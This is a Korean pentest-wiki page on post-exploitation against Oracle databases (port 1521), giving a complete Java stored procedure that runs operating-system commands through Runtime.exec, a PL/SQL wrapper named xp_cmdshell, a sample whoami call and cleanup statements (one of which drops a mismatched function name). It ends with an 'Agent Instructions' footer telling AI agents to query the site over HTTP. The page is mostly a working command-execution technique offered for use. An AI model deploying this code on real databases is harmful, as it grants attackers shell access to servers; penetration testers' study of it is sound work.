# 1521 - oracle

### getRuntime

Oracle JVM은 Java 애플리케이션 및 코드를 실행할 수 있는 자바 가상 머신(Java Virtual Machine)의 종류입니다. MSSQL과 같이 직접적으로 시스템 명령 실행을 지원하는 함수는 없지만, 자바 코드를 이용하여 시스템 명령 실행이 가능합니다.

{% code title="Java code" %}

```java
CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "CommandExecutor" AS
import java.io.*;
import java.nio.charset.StandardCharsets;

public class CommandExecutor {
    private static final int MAX_OUTPUT_CHARS = 4000;
    public static String run(String cmd) {
        if (cmd == null || cmd.trim().isEmpty()) {
            return "No command specified";
        }

        StringBuilder sb = new StringBuilder();
        try {
            Process proc = Runtime.getRuntime().exec(cmd);
            try (BufferedReader outReader = new BufferedReader(
                     new InputStreamReader(proc.getInputStream(), StandardCharsets.UTF_8));
                 BufferedReader errReader = new BufferedReader(
                     new InputStreamReader(proc.getErrorStream(), StandardCharsets.UTF_8))) {

                String line;
                while ((line = outReader.readLine()) != null) {
                    if (sb.length() + line.length() + 1 > MAX_OUTPUT_CHARS) {
                        sb.append("\n...[output truncated]...");
                        break;
                    }
                    sb.append(line).append('\n');
                }
                while ((line = errReader.readLine()) != null) {
                    if (sb.length() + line.length() + 1 > MAX_OUTPUT_CHARS) {
                        sb.append("\n...[output truncated]...");
                        break;
                    }
                    sb.append(line).append('\n');
                }
            }
            int exitCode = proc.waitFor();
            sb.append("[exitCode=").append(exitCode).append(']');
            return sb.toString();

        } catch (Exception e) {
            return "ERROR: " + e.getClass().getName() + ": " + e.getMessage();
        }
    }
}
/
```

{% endcode %}

{% code title="Oracle code" %}

```sql
CREATE OR REPLACE FUNCTION xp_cmdshell(cmd VARCHAR2)
RETURN VARCHAR2
AS LANGUAGE JAVA
NAME 'CommandExecutor.run(java.lang.String) return java.lang.String';
/
```

{% endcode %}

Java 소스 및 함수를 등록할 수 있는 권한이 있어서 성공적으로 등록했다면, 등록한 사용자 함수인 xp\_cmdshell을 통해서 시스템 명령 실행이 가능합니다.

<pre class="language-sql"><code class="lang-sql"><strong># 사용자 함수 호출
</strong>SELECT xp_cmdshell('whoami') FROM dual;

<strong># Java 소스 및 사용자 함수 제거
</strong>DROP JAVA SOURCE "CommandExecutor";
DROP FUNCTION kisatest;
</code></pre>

## Demo

<figure><img src="/files/Uf5AMxLuidA3yiPpZeYV" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/post-exploit/protocols/1521-oracle.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.